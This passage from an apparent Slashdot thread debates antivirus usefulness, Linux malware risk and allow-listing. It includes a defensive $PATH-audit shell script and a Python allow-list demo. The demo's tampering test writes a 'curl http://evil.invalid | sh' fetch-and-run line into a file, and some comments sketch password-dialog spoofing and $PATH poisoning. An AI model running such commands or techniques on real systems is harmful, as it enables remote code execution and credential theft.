      "When I first heard Daydream Nation it quite frankly scared the living shit out of me." -- Matthew Stearns
    7. Re:where are all the Linux server exploits .. by KDR_11k · · Score: 1

      It's no major feat to trick a PEBKAC into running something as root.

      --
      Justice is the sheep getting arrested while an impartial judge declares the vote void.
    8. Re:where are all the Linux server exploits .. by Dr_Barnowl · · Score: 3, Insightful

      I don't think so.. on my MythTV box, I always run as root ; but the only time I log into it is to do sysadmin, so that's reasonable. It doesn't have a desktop environment, just a single application (MythTV) that runs on a bare X server.

      It got up my nose slightly when I installed Ubuntu on my desktop and I needed to supply a password to perform admin tasks, and type "sudo" before admin commands in a terminal, but on the whole, it achieves the desired effect ; it makes you actually consider what you are doing before doing it.

      I *do* habitually run Windows as Admin, because if you are a developer it's a pain in the arse not to. But I don't pick up malware of any kind because I don't download software from untrusted sources, use IE, or open unknown email attachments. Once in a while I install anti-malware and run it. And scan it from the Linux instance on the same box as well.

      Will Linux newbie users infect their systems with huge amounts of malware? Well, I don't think so.

        * As people noted, there isn't a huge amount of desktop malware around NOW because the Windows target is so much bigger.
        * The vast majority of software installed on desktop distributions of Linux is done using a package manager. Any package manager worth its salt will be operating out of a reputable source, with checksum verification.
        * The vast majority of software that the average user uses has an equivalent in the official package repositories.

      On the other hand, nothing is foolproof and there an awful lot of fools out there, like my sister in law who infected her machine with 427 nasties by believing things she saw in IE.

    9. Re:where are all the Linux server exploits .. by GreggBz · · Score: 4, Interesting

      A user compromise on a Linux system would provide suitable functionality for today's typical malware.

      On my default, fully security patched Mandriva workstation:

      - I have full read write execute permission to my home directory.
      - I can run wget to download anything, and put it as an executable anywhere in my home directory.
      - I can use perl, awk, whois, grep, sed, whatever, to craft some pretty nasty scripts.
      - I can use telnet and I could write an expect script to send spam with telnet.
      - Or, I could just download a precrafted elf binary to run as a mini-mail server in my home directory.
      - It's not too hard to imagine that I could pop something in /tmp or elsewhere that would persist on the system even after the user had been deleted.
      - I could fire off a fork bomb that will crash the system instantly.

      It does not take too much imagination to figure out some suitably bad stuff that you could do as any old user.

      Of course, hiding yourself on the system and ensuring your survival could be difficult. It would be easy to find all the nasty services running as said user, since top, ps, etc.. would not have been compromised.

    10. Re:where are all the Linux server exploits .. by baadger · · Score: 1

      If you can tell me a way to cheaply and conveniently backup my /home, which is approximately 1 TB in size, please do so.

    11. Re:where are all the Linux server exploits .. by hoopshank · · Score: 1

      "The reason that Linux is largely unaffected is that it is not very widely used .. If/when we succeed in bringing Linux to the masses, this layer of protection will be torn away"

      I'm sure part of the reason Windows is attacked is not just because it's so widespread but because it's produced by Microsoft who have shown some pretty dodgy business practices over the years. I hope that most hackers (other than the significant number who make money through malware, etc) are kind of revolutionary or, like myself, wish the wealth could be more evenly distributed. I think most hackers aren't just in it to piss people off. If Linux ever dominates the OS market, there will still be thieves but I would hope there would be fewer hackers just trying to piss off users because they use that particular OS.

    12. Re:where are all the Linux server exploits .. by DaveWick79 · · Score: 1

      Buy a 1TB external disk for under $300. Or a couple of 500GB drives, which will be cheaper.

      You've really got no excuse for not doing backups, it's going to cost you a heck of a lot more to recover that data if you don't have the backup.

    13. Re:where are all the Linux server exploits .. by BlakLanner · · Score: 1
    14. Re:where are all the Linux server exploits .. by cHiphead · · Score: 1

      The bane of IT departments everywhere..

      Cheap, Convenient, or Reliable, you only get to pick one.

      Cheers.

      --
      This is my sig. There are many like it, but this one is mine.
    15. Re:where are all the Linux server exploits .. by Knuckles · · Score: 1

      I didn't say it's always simple or cheap. But a harddrive failure can still wipe it out just like malware can, so you need to have a backup anyway if you want to be safe.

      --
      "When I first heard Daydream Nation it quite frankly scared the living shit out of me." -- Matthew Stearns
    16. Re:where are all the Linux server exploits .. by IamTheRealMike · · Score: 1

      Of course, hiding yourself on the system and ensuring your survival could be difficult.

      It's easy. Poll /proc looking for Synaptic/Ubuntu Update or whatever the GUI package manager wrapper du jour is, and when you see it being started, send SIGSTOP and open up a clone of the system's "Enter your admin password" dialog box. Wait for the user to enter the root password and away you go, rootkits ahoy. Windows has some mechanisms to try and defend against this, I've yet to see a Linux distro that does.

    17. Re:where are all the Linux server exploits .. by Lennie · · Score: 1

      If you look at the amount of spam trying to bypass spam-filtering systems, I think the hackers you talk about are somewhere in the past. These people are just in for the money.

      --
      New things are always on the horizon
    18. Re:where are all the Linux server exploits .. by Todd+Knarr · · Score: 1

      Won't work. The package manager is running as root, the polling program looking to fake the dialog will be running as your regular user account. Trying to SIGSTOP (or send any other signal to) a process running as a different user will get anyone but root an EPERM error. Likewise trying to use the X facilities to kill the window: you don't have permission to do that to some other user's windows.

      This is where the Unix heritage shows compared to the Windows heritage. Windows grew up as a single-user OS, everything running on the box belonged to the same person. Unix grew up with multiple users always logged in, and the requirement from day 1 that it prevent them from messing with each other.

    19. Re:where are all the Linux server exploits .. by Non-Huffable+Kitten · · Score: 1

      Interesting. What about running su in a terminal emulator (say konsole) running as my user? Can that be intercepted by user-privilege malware?

      --
      Medium cat is MEDIUM.
    20. Re:where are all the Linux server exploits .. by Todd+Knarr · · Score: 1

      If the malware can place a binary named "su" in a directory that's in your $PATH before the directory containing the real su program, then yes it can. Of course there's several ways to prevent that from working. The most convenient one in a GUI environment is to use a "root console" icon that doesn't use su but a special SUID wrapper program located in a system directory and uses absolute paths for the executables involved so that $PATH-variable poisoning can't affect which binaries get run. Another one is to place any home-directory-tree additions at the tail end of $PATH so system binaries can't be overridden without changing $PATH in your current environment (alterations in a running program's environment don't propagate back up to the shell's environment, which makes it very difficult for any program other than your shell itself to change your shell's working $PATH).

      Note that even if su gets hijacked, you'll notice because either you'll be prompted for the password a second time or you won't get root privileges. And the root password is in general not useful to an outsider. Programs like su that prompt for the root password do their input through the terminal, not through the standard input/output streams, making it very difficult for the malware to stuff the password into the input programmatically, and almost all remote-access services in Unix won't allow root to connect remotely even with the correct password (note that "remotely" in this case includes connections to the machine's own IP addresses including 127.0.0.1).

      None of this is accident. The "plant a password-stealing binary somewhere in your victim's $PATH using the same name as a program he regularly uses" trick is ancient, at least 30-35 years old on Unix, and Steps Were Taken after the first spate of pranks based on it.
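      The $PATH ordering advice in the post above (home-directory entries only at the tail, nothing relative or empty ahead of the system directories) is easy to check on a login shell. This is an added example, not code from the thread or from any distro: the list of "system" directories and the /home/alice sample value are assumptions.

```shell
#!/bin/sh
# Added example, not from any post in this thread: audit a $PATH value for the
# ordering problem discussed above, i.e. user-writable entries that come before
# the system directories and could therefore shadow su and other system tools.

# Directories treated as "system" for ordering purposes (assumption).
SYSTEM_DIRS="/usr/local/bin /usr/local/sbin /usr/bin /usr/sbin /bin /sbin"

is_system_dir() {
    for d in $SYSTEM_DIRS; do
        [ "$1" = "$d" ] && return 0
    done
    return 1
}

# audit_path PATHVALUE HOMEDIR
# Prints one finding per line; returns 0 when clean, 1 when anything was found.
audit_path() {
    path=$1 home=$2 found=0 seen_system=0 pos=0
    # Append a separator so a trailing empty field ("a:b:" = cwd) stays visible.
    rest="$path:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        pos=$((pos + 1))
        case $entry in
            ''|.)
                # Empty entry or "." means the current directory is searched.
                printf 'entry %d: current directory in PATH ("%s")\n' "$pos" "$entry"
                found=1 ;;
            /*)
                if is_system_dir "$entry"; then
                    seen_system=1
                elif [ "$seen_system" -eq 0 ]; then
                    # Absolute, non-system entry ahead of every system dir:
                    # flag it if it is under $HOME or a world-writable tree.
                    case $entry in
                        "$home"|"$home"/*)
                            printf 'entry %d: home directory %s precedes system dirs\n' "$pos" "$entry"
                            found=1 ;;
                        /tmp|/tmp/*|/var/tmp|/var/tmp/*)
                            printf 'entry %d: world-writable tree %s precedes system dirs\n' "$pos" "$entry"
                            found=1 ;;
                    esac
                fi ;;
            *)
                printf 'entry %d: relative path "%s"\n' "$pos" "$entry"
                found=1 ;;
        esac
    done
    return "$found"
}

# Interactive use: audit_path "$PATH" "$HOME"
```

      The check is purely on the string, so it runs the same on any shell; it does not look at the directories' actual permissions.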

  20. It's time to lock auto-run by Krneki · · Score: 0

    Bloatware, spyware, viruses, .... For me they are all the same in the end they slow down your work. I like Linux repositories, because those packages aren't controlled by sales department. Each time I install a program on windows I have to run HiJackThis.exe to check it didn't put itself in the auto-run. The same is valid for 99% of viruses, they use auto-run "features" to enable them to run each time you start your OS or application.

    --
    Love many, trust a few, do harm to none.
  21. Heuristics in "easily defeated" shock by Cheesey · · Score: 1

    The funny thing is that AV software has been almost totally useless ever since we moved from floppy disks to Net connections - long before they started whitelisting malware from major corporations. As soon as it became possible to distribute malware more quickly than AV updates, AV software was dead in the water. And even before then, the writing was on the wall: the problem of detecting a virus is undecidable and you can't change the laws of math.

    Good luck convincing your boss that AV software is snake-oil though. Best carry on paying and taking a performance hit every time you open a file.

    --
    >north
    You're an immobile computer, remember?
    1. Re:Heuristics in "easily defeated" shock by kongit · · Score: 1, Interesting

      I wouldn't say it is pointless. However, overusing an AV is pointless. Scanning a file every time it is accessed is pointless, as it should have been checked before it was allowed permanently on the machine. If that file has not been modified since the last AV check it should not be scanned. Additionally scanning files you create is rather pointless because if you are putting a virus in your files either a) you know what you are doing or b) you have another virus or trojan somewhere else putting that virus in your file so any action on the created file would not fix the problem. There are many viruses out in the wild and most AV software can check for many of them. Not only are new viruses a threat but older ones can still cause large problems. So AV software does have a place in modern computing, but many developers of AV software make it do more than it needs to and use way too much overhead and time to do it.

      Using the internet is like sex. The only way to completely avoid viruses is abstinence. It is almost always safe if you do it with somebody you know to be safe like a spouse. If you are dealing with the unknown or unreliable, protection is your best bet. While AV software isn't as reliable as a condom (which isn't 100% reliable) it is better than nothing.

    2. Re:Heuristics in "easily defeated" shock by Opportunist · · Score: 1

      Take that tin foil hat off for a moment to vent some hot air, please.

      Could you first of all please inform us what has been whitelisted? Aside of copy protection mechanisms (which should be classified malware, but guess what: PEOPLE WANT TO BE ABLE TO PLAY THEIR GAMES!), I'm not aware of any whitelisting taking place. At least in the more reputable companies in the biz.

      Second, yes, with networking it's easy to distribute malware quickly. But the other way around is true too, AV vendors get new samples much more quickly, too. What is true is that the spreading cycle changed from a few months to a few hours, but so did the detection and prevention systems. It is no longer an issue to push a critical update to your client in time. Of course, if your customer insists in updating once a week, he's underprotected. But that's not the AV manufacturer's fault.

      The paper you quote is well known in AV circles. I have a copy of it hanging on my wall. Yes, I have a fairly twisted sense of humor. Mostly, I enjoy to see that something doesn't instantly become truth just because you wrap it up in formulas so people have a hard time understanding it. But it's math, so it's proven, so it has to be right. I give you that much that heuristics cannot detect a virus flawlessly. That has never been the aim nor has anyone (reputable) ever claimed it is. When you talk about snake oil, talk about those virus vendors that claim their heuristics can catch anything there is out there. It cannot, and it never will be able to.

      The virus-antivirus battle is an arms race, nothing more, nothing less. "Evolving" and "morphing" viruses are a tiny minority, mostly consisting of POC and "look, I can do it!" projects. The main threat today are commercially created malware kits targeting you to get you as a spamming platform or to steal your ID to harvest you for money. Creating a morphing trojan is far too expensive when a non-morphing can do the job just fine. This might change, but so far there is simply no reason to change anything. Virus writing has become a business, not more, not less. It's a matter of investment and return thereof.

      So please, before jumping to conclusions, just take a look at the whole picture. Yes, it's impossible to determine whether something is a virus or not by "just looking" at it. But that doesn't mean AV tools are pointless. It means heuristics are.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    3. Re:Heuristics in "easily defeated" shock by SCHecklerX · · Score: 1

      The problem that AV tries to 'solve' is simply a user behavior problem. Bad approach, and it obviously doesn't work. Worse, the AV software does what I would personally consider bad things on the systems it runs on: killing IO, potentially corrupting files that are being written, eating cpu cycles, etc.

      Yes, I understand that attempts at education aren't working either. Most people are screwed either way. I deal with it by not supporting anybody who won't take the time and effort to learn how to properly use their tools (the computer in this case).

    4. Re:Heuristics in "easily defeated" shock by Opportunist · · Score: 1

      The problem is that those people are not only a problem for themselves. Actually, more often than not, they're more a problem for others than themselves.

      If they could only trash their own machine, then I'd find me another (most likely better paying) job, maybe as a security guy with one of our online casinos. You trashed your computer due to your own stupidity? Good! Means you're off the net and, hell, let Darwin be right, who's not fit to live will die, who's too stupid for a computer doesn't deserve one.

      Those people are a threat to others, though. People who do care about security, who do keep their machines well patched and still, those insecure slobs are a threat or at the very least a nuisance. They keep hammering your firewall with worms, they flood your inbox with spam and most intimidating, they can be used in a massive DDoS storm to blow you, the secure guy, out of the net.

      I'm well aware that AV kits aren't the solution to user stupidity. They're at best a band aid. Unfortunately, it's about the maximum of what level of care you'll find in those that don't know anything or care about their computer's security: That they might install one of those AV kits.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  22. welcome to the modern ages ... by freaker_TuC · · Score: 1

    ... where you can whistle in 1200 baud and more over the phone ...

    --
    --- I am known for the ones who want to find me on the net. Is that a privacy risk or a privilege? One might wonder..
  23. The kind of targets by _merlin · · Score: 5, Insightful

    I disagree. I think the reason there are fewer pieces of malware floating around for Linux is because of the kind of roles Linux machines typically serve in. Most Linux machines are servers or enterprise workstations. In the case of a server, there will be a system administrator who is responsible for configuring the server, locking it down, and keeping it up. Chances are, they'll notice malware pretty quickly, and do something about it. Enterprise workstations aren't an attractive target, either: they're usually either a shared machine that's locked down hard, and under the eye of a sysadmin, or they're the pet of a tech-savvy user who wants his box in top condition so s/he can get stuff done.

    Malware is all about money these days, whether it's herding bots so you can sell spamming services, or getting paid to DDoS someone's competitor, sniffing credit card numbers to buy stuff, or sniffing personal details for identity theft. Remember that your attack isn't 100% reliable, so you want as many potential targets as possible, and you want to attack weak targets so as to get the highest possible success rate. All so you can make as much money as possible, of course.

    And what's the best target? Home Windows PCs, of course. No vigilant sysadmin monitoring the system; average Joe user doesn't grasp the concept of locking his box down, let alone have the m4d skillz to do it; Joe doesn't install patches regularly because he sees the downloads and restarts as nothing more than an annoyance; Joe doesn't really understand his computer, so he doesn't know how to look for the telltale signs of malware; Joe doesn't understand that he has to keep his virus scanner's definitions up to date, and turned off the annoying prompts; Joe doesn't understand a firewall, so he just clicks "Allow" to get rid of the warning message; the list goes on forever...

    Now that MacOSX is becoming more popular, we're seeing a bit of malware for it, too. Example, that thing that claimed to be a video codec, but was really a DNS redirector. Now this one is a very good example of how malware authors target uninformed users: in the standard OSX installer program, there is an option to show the files that will be installed; if you or I (as /. geeks) looked at the files that this "codec" was installing, we would see that it couldn't be a real codec at all, and we could cancel the install; but an uninformed user won't know to look at file listings, and won't know what looks right, and what doesn't. It wasn't a failing of the OS: it was a valid installer package that prompted for authorisation to run; it was all about users who don't know how to administer a system.

    Until Linux is popular in the hands of inexperienced, non-tech-savvy home users (as opposed to enterprise), it won't be an attractive target for malware authors, and we won't see its security put to the test. When it does become popular, I expect we will see Linux malware, and I expect it will be like OSX malware, in that it relies on failings of the user, rather than the system itself.

    For the record, I use OSX and Solaris at home, and develop for whatever I'm paid to develop for at work (which was, until recently, Windows, Linux, Solaris and OSX - looks like it will be just Solaris soon).

    1. Re:The kind of targets by arminw · · Score: 1

      ..... in that it relies on failings of the user, rather than the system itself..........

      Most users will give the password if prompted. We mitigate these user failings here by not letting them know the administrator password. Then if they want to install something that asks for this, they are stuck. This works poorly for Windows because there are still many legit programs that will not work unless the user has admin rights over the whole system.

      Mac users have no real reason to know the system password for everyday use. Of course malware can still run in user space and possibly get around such protections. It does make it a lot harder for the virus writers if they cannot simply social engineer their way into the heart of the OS. Most of the malware authors assume that they can trick users into installing anything at all on the system.

      This is a bit more work for us if users do have to install something that requires the admin password, but cleaning crap software out of computers is even more work.

      --
      All theory is gray
    2. Re:The kind of targets by heinousjay · · Score: 0, Redundant

      Mac users have no real reason to know the system password for everyday use

      Sure they do, they generally have to administer their own box.

      There could be a few bucks in doing a remote admin service for home users who have neither the skills nor the inclination to use them. I'd google to see if someone does that already, but I'm feeling lazy.

      --
      Slashdot - where whining about luck is the new way to make the world you want.
    3. Re:The kind of targets by gzipped_tar · · Score: 3, Informative

      Surely the weakest part is between the chair and the keyboard.

      A search on Secunia tells a story of an old Linux virus (or rather, a piece of malware). The virus comes from a phishing mail in C source code. Unless the luser has root privilege and is nuts, nothing could happen at all.

      Consider one day M$ is dead and every luser in every corner of the world runs a Linux desktop. Then the luser happily runs su and make install, without even a single glance at the source code.

      --
      Colorless green Cthulhu waits dreaming furiously.
  24. There are just too many false positives by someone1234 · · Score: 2, Interesting

    AVG, for example, shows nwn2main.exe (Neverwinter Nights 2 from Obsidian) as a false positive.
    Sure, it is partly because of the inane copy protection, but AVG should do some tests before issuing such crap.

    Luckily the 'infected exe' is recoverable, and after disabling the resident shield it will run. But then, why do you have AV in the first place?

    --
    Patents Drive Free Software as Hurricanes Drive Construction Industry
    1. Re:There are just too many false positives by Opportunist · · Score: 2, Insightful

      Sorry, but it's not easy for AVG to take care of that. There are billions of programs out there, many using calls and features the average malware will use, too: self modification, installation of drivers, calling drivers in ways that are more than just a little strange, debugger and tracer detection routines and so on.

      In short, copy protection mechanisms share a fair lot of features with malware. It is often not easy to discriminate between them.

      Now, it's likely that AVG didn't have access to NWN2 to ensure their routine won't find it. If anything, I'd complain about a program behaving like a trojan, not about an AV tool finding something they didn't know about.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  25. Last year's was better? by Oktober+Sunset · · Score: 1

    So what I need to do is uninstall my current anti virus and install one from last year, and not update it to the new less effective version from this year?

    1. Re:Last year's was better? by Opportunist · · Score: 1

      I'm aware that you're joking, but I honestly fear that others would come to that conclusion without joking, unaware that malware isn't a static field, set in stone and never evolving. Those are essentially the same people complaining that they bought an AV scanner 3 years ago, never updated it, and now it won't find a thing.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:Last year's was better? by Oktober+Sunset · · Score: 1

      wait, if it won't find a thing, then surely their computer is free from viruses, that process "fuckallyourshitupandstealyourbankdetails.exe" must be totally normal.

  26. Useless by Jessta · · Score: 3, Insightful

    Antivirus has always been useless. It's not proper security.
    Imagine having a doorman who has a list of everyone you hate, and everyone on that list is not allowed in your house. An enemy is prevented access, but a stranger can still walk away with your TV. Wouldn't it be better to give the doorman a list of all your friends instead?

    Blacklisting is a really bad way to prevent unwanted activity. Whitelisting is much better.

    --
    ...and that is all I have to say about that.
    http://jessta.id.au
    1. Re:Useless by ledow · · Score: 3, Informative

      The trouble with antivirus is that the doorman is actually sitting upstairs with a note on the front door that says "Report to the doorman upstairs, please." By the time AV spots a virus it's usually already far too late and the first thing that any virus does is to turn off AV, usually in such a way that the user doesn't notice (the equivalent of swapping your doorman for a clone).

      AV is good only as a system check. It is no good as a frontline defence. It can't spot viruses until they are either already in memory or sitting on your disk. Some of the time it will spot them before they get executed but most of the time not. When I used to use Windows at home (I only use it on school networks now, I work as a tech in schools) the one way to "tell" that you had something dodgy going on was when Zonealarm went ape. Even the integrated Zonealarm Security Suite, AVG etc. didn't detect the stuff that I was testing. But when something starts asking for Internet access out-of-turn, you know something's wrong. And when your AV is less use than a freeware firewall that bothered to ask you, you know it's a waste of time.

      AV-scanning-proxies : excellent idea
      AV scans of networks: good idea
      AV scans of home machines: pointless and doesn't tell you what you can't find out in ten seconds of using the machine as an IT professional.
      AV "real-time scanners": Well, yes, if you must, have CPU to spare and ignorant users using the machine. Otherwise, they're pointless.

    2. Re:Useless by Opportunist · · Score: 1

      That's how most firewall tools work. What do you think would happen when something like this becomes the norm in the AV world?

      A firewall only cares about programs that try to create connections to the outside world. And even though it doesn't really seem that way, those programs are a tiny minority of the things running in your machine. Still, if you ever used some firewall software, you'll quickly notice that as soon as some part of your OS gets updated, it starts to puke, scream and pop up every few seconds to minutes, complaining that something changed and that you didn't inform it about that.

      Now imagine this happening hundredfold. Do you REALLY think that would increase your productivity? If you thought Vista's "allow-deny" nagging was horrible, you ain't seen nothing yet.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    3. Re:Useless by FredFredrickson · · Score: 1

      It can't spot viruses until they are either already in memory or sitting on your disk. Not really. AV protection programs can certainly tell if there's an active infection on your machine. The major problem with AV software is that when it's in memory, AV software is particularly bad at removing it. (Try deleting a file that's in memory. Can't do it? Try closing the program, then deleting? Oh, works now!)

      The question I've always wondered is why something like Norton doesn't do more to control software that's running. Anybody who takes a look at RKunhooker with Norton installed knows that Norton puts a lot of hooks into the system, including on process start and end calls - Norton pretty much becomes the gateway. But it doesn't do anything to stop infections from running, and then when you do a virus scan it reports that it can't clean the infection. You'll find it can't because the infection is in memory and therefore won't be deleted.

      It's actually fairly easy to completely remove an infection, but sometimes requires running ERD or bartPE to remove items from startup and delete certain DLLs that load automatically with explorer. Once the hooks are removed, there are no active infections, just dormant files waiting for an AV to delete them.
      --
      Belief? Hope? Preference?The Existential Vortex
    4. Re:Useless by Jessta · · Score: 1

      You miss the point: having an allow-deny popup is just as pointless.
      You have a predefined list of programs that can run and what they are allowed to do; everything else is denied.

      On a home machine:
      * programs installed through the package manager are automatically added to the list with their default privileges
      * If a user tries to run a denied program they are informed that it's untrusted and probably dangerous, but because it's a home machine they are given the option to run it anyway.

      On an office machine:
      * only programs signed by the administrator can be run
      * if a user wants to run a program not in the administrator's repository they have to contact the administrator.

      it's pretty simple stuff.

      --
      ...and that is all I have to say about that.
      http://jessta.id.au
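An added example of the allow-list Jessta describes above; it is not code from the post or from any product mentioned on this page. Programs are identified by the SHA-256 of their bytes rather than by name or path, each entry carries the privileges it was installed with, a home machine warns and lets the user override, and an office machine refuses outright. The privilege labels, file names and the "installed through the package manager" step are constructed for the demo, as is the tampering at the end, which shows why hashing the contents matters: a trojanised copy at the same path drops off the list by itself.

```python
import hashlib
import os
import tempfile
from dataclasses import dataclass, field
from enum import Enum


class Verdict(Enum):
    ALLOW = "allow"   # hash is on the list: run with its listed privileges
    DENY = "deny"     # not on the list, office policy: refuse outright
    ASK = "ask"       # not on the list, home policy: warn, let the user decide


@dataclass(frozen=True)
class Entry:
    sha256: str
    privileges: frozenset   # constructed labels such as {"network", "write:home"}


def sha256_file(path, chunk=1 << 16):
    """Hash the file contents; the path or name is never trusted."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


@dataclass
class Allowlist:
    """Allow-list keyed on content hash, so a replaced binary is no longer 'known'."""
    entries: dict = field(default_factory=dict)   # sha256 -> Entry

    def register(self, path, privileges=()):
        """Called by the package manager (home) or the administrator (office)."""
        digest = sha256_file(path)
        self.entries[digest] = Entry(digest, frozenset(privileges))
        return digest

    def decide(self, path, mode):
        """Return (verdict, privileges) for a request to run `path`.
        mode is "home" or "office", the two policies from the post."""
        entry = self.entries.get(sha256_file(path))
        if entry is not None:
            return Verdict.ALLOW, entry.privileges
        if mode == "office":
            return Verdict.DENY, frozenset()
        if mode == "home":
            return Verdict.ASK, frozenset()
        raise ValueError(f"unknown mode: {mode!r}")


def demo():
    """Constructed scenario: one program installed via the package manager, one
    downloaded by the user, and the installed one later tampered with."""
    with tempfile.TemporaryDirectory() as d:
        trusted = os.path.join(d, "editor")
        stranger = os.path.join(d, "free_screensaver")
        with open(trusted, "wb") as f:
            f.write(b"#!/bin/sh\necho editor\n")
        with open(stranger, "wb") as f:
            f.write(b"#!/bin/sh\necho screensaver\n")

        wl = Allowlist()
        wl.register(trusted, privileges={"write:home"})
        results = {
            "trusted_home": wl.decide(trusted, "home"),
            "stranger_home": wl.decide(stranger, "home"),
            "stranger_office": wl.decide(stranger, "office"),
        }
        # Same path, different bytes: the hash no longer matches the entry.
        with open(trusted, "ab") as f:
            f.write(b"curl http://evil.invalid | sh\n")
        results["tampered_office"] = wl.decide(trusted, "office")
        return results


if __name__ == "__main__":
    for name, (verdict, privs) in demo().items():
        print(f"{name:16} {verdict.value:6} {sorted(privs)}")
```

The enforcement point (hooking exec, or a kernel policy such as a signed-binary check) is deliberately left out; the part that decides is the same whichever hook feeds it.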
  27. Standard advice? Ouch. by Xest · · Score: 1

    That's some pretty poor advice, to run multiple anti-virus apps. Other than AV vendors, who all want a piece of the pie, where is this being suggested? Initially there's the fact that many conflict in their tasks and implementation, to the point where having multiple AV programs will sometimes go as far as giving you a nice BSOD each time you boot up, until you can mangle one AV app out of your system using the recovery console or safe mode (some versions of Symantec and McAfee, for example). Ignoring that, however, there's the most prominent problem of the ridiculous drain on system resources you'll suffer from having one, let alone 2 AV apps - even worse if you stick an anti-spyware app in as well! I've yet to see any enterprise network deploying multiple AV solutions to the same machines, and the only place I could see this being advised is the likes of Futureshop, PC World or whatever big chain wants to make as much money as possible selling useless apps in your particular country.

    The best way to protect yourself from viruses or spyware is to not get them in the first place. That requires educating users to avoid sites that appear dodgy, to not download anything that isn't from a reputable publisher and to not open attachments unless you're expecting them and trust the source fully.

    Current AV systems are flawed; malware has evolved but AV software really hasn't. It's still following the paradigm of reactive action, which is hopeless in today's world because by the time AV software has acted the malware has already had the chance to embed itself and potentially even disable or remove the AV in question.

    It's only going to get worse, too. I'm not entirely sure why we haven't seen extremely vicious viruses yet, but I'd like to think that it's because anyone competent enough to write such a virus would be intelligent enough to put their efforts elsewhere for good use. Looking forward, for example, with advances in AI we might encounter viruses that can mutate to use new security holes, viruses that work as P2P networks to distribute virus updates and hence become as difficult to shut down as the file sharing phenomenon, and so on. The current AV market is both a sham and a scam; to suggest that much of the AV software out there really protects people is a lie, it doesn't. The times I've seen AV programs out there detect stuff, all too often they can't clean it and so manual removal ends up being the only solution anyway.

    Viruses need to be stopped at the borders, but the difficulty is simply the amount and type of borders (Internet - various services, floppy, USB, CD, etc.). We can of course follow the trusted computing route, but that's not ideal either, because companies don't trust us to use our computers, so we lose a massive amount of freedom which to many of us makes computing great. There's no easy solution to the problem, but the current option offered by AV vendors isn't even a viable start to the solution now, let alone in the future; it's like trying to save a decapitated person by sticking a bandage on their neck when the only way to save them was to prevent such an accident in the first place. Sticking multiple bandages on that neck still isn't going to save that person!

    1. Re:Standard advice? Ouch. by barzok · · Score: 1

      I'm not entirely sure why we haven't seen extremely vicious viruses yet but I'd like to think that it's because anyone competent enough to write such a virus would be intelligent enough to put their efforts elsewhere for good use.
      I think it's more because a "mildly irritating" virus will be removed, leaving the host to get infected again. An "extremely vicious" virus will take out the host and whatever replaces it will be better protected. Enough of this goes on and the number of available hosts drops significantly.

      Plus, there's more money in writing an "irritating" virus which operates as part of a botnet than a really nasty one that just takes systems out completely.
    2. Re:Standard advice? Ouch. by Xest · · Score: 1

      Sorry I should have clarified, by vicious I didn't so much mean damaging but more one that has extremely strong infection capabilities and strong countermeasures against removal (anti-anti-virus etc.).

      In a P2P virus network there's no reason the virus couldn't update itself with new plugins for exploiting new vulnerabilities, allowing it to spread yet further. If the virus could also update its anti-anti-virus techniques it could potentially be very hard to wipe out whilst still fulfilling the same purposes as existing hijacked PCs - essentially we'd be looking at extremely resilient botnets that literally expand themselves and, to an extent, protect themselves even in the face of many of today's standard countermeasures.

      I've not been up on what bot herders are up to nowadays, but it can only be a matter of time before these techniques are adopted, if they don't exist already.

  28. Most AV solutions by Mgns · · Score: 1

    really just make my machine choke and die. I run an ancient computer with only 256 MB of RAM, more than enough for my use, but not long ago I knew I'd been infected. So I HAD to install something.

    I ended up installing the free 30 day trial from Norman. Long story short, it's the only AV I've ever tried that I didn't positively hate.

  29. The Real Reason by LaskoVortex · · Score: 1

    The real reason for massive viruses is Windows. I know all of the "unbiased" people will mod this down, but you are fooling yourselves if you think Windows is a legitimate operating system. I set my brother and uncle up with Ubuntu boxes last summer and they haven't needed to reboot yet! No viruses. Top speed. Both of them previously had Windows machines that took all of about 2 weeks to get so loaded with viruses, it was silly. They haven't had a problem with this since May. Windows isn't going away, you say, but it friggin' should. You probably want to call me a "fan boy", but you have chosen and/or support the wrong operating system, plain and simple. Every time I set someone up with a Linux box, their virus problems go away and their (ancient) machines purr. Am I biased? Confused? It's friggin' results, people. I tell you what, if you've done the work to convert four *real* people away from that shit operating system Windows and still disagree, mod this down. If you haven't then you have no business having an opinion. I speak from the trenches - real users with *no* savvy, personal computers, home use, no VM. I set them up and they fly. Convert some of these people and see how they begin loving their PCs. Don't mod this if you don't have the cred. Mod it up if you know what I'm saying.

    --
    Just callin' it like I see it.
    1. Re:The Real Reason by Opportunist · · Score: 2, Insightful

      Windows is an insecure piece of crap. Ok. So far, so good. But the real reason why it is the main target for malware is simply that it is the most used system.

      Malware has turned into a business. It's no longer the 16 year old pimple-face that wants to prove he has the longest virtual dick. It's biz. Malware is being written in almost normal looking "companies", cranking out quite professional software, complete with versions, updates, CVS systems and other things you'd expect in a "normal" software company. Because it simply IS a normal software company, with the goal to make money from their software.

      The main reason they target Windows isn't its inherent insecurity. It's simply that this is the main system used in the world. It would not be a bit different if the system with 90% market share were Linux or MacOS.

      Now, I can already hear "but it's harder to infect a Linux machine". Bullcrap! To infect a fully patched Windows system is about as hard, at least if the user isn't a complete tool. And with a user that has the computer ability of a slightly moldy slice of toast, it does not matter how secure the machine itself may be. It will probably take a bit more social engineering, but people are stupid enough to click on everything, allow everything and hand any kind of crapware their root password when you promise them some nude pics, some crack for a piece of software or some make-money-fast software.

      The reason why it doesn't happen is simply that it doesn't pay to go to those lengths. A Linux system run by a user who can't tell a floppy disk from a USB stick is still such a tiny, insignificant minority that it's simply not worth developing for him.

      --
      We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
    2. Re:The Real Reason by cdrguru · · Score: 1

      If I send your brother and uncle an email that says "click this and get rich!!!" and they do it, they are going to get infected with something. Linux might be a bit harder, especially if you keep the user from doing anything "administratively" with the computer, but if you execute an untrustworthy program on the computer you are going down the road to trouble. If your computer then asks for permission to do something "administrative" and you grant it, you're had.

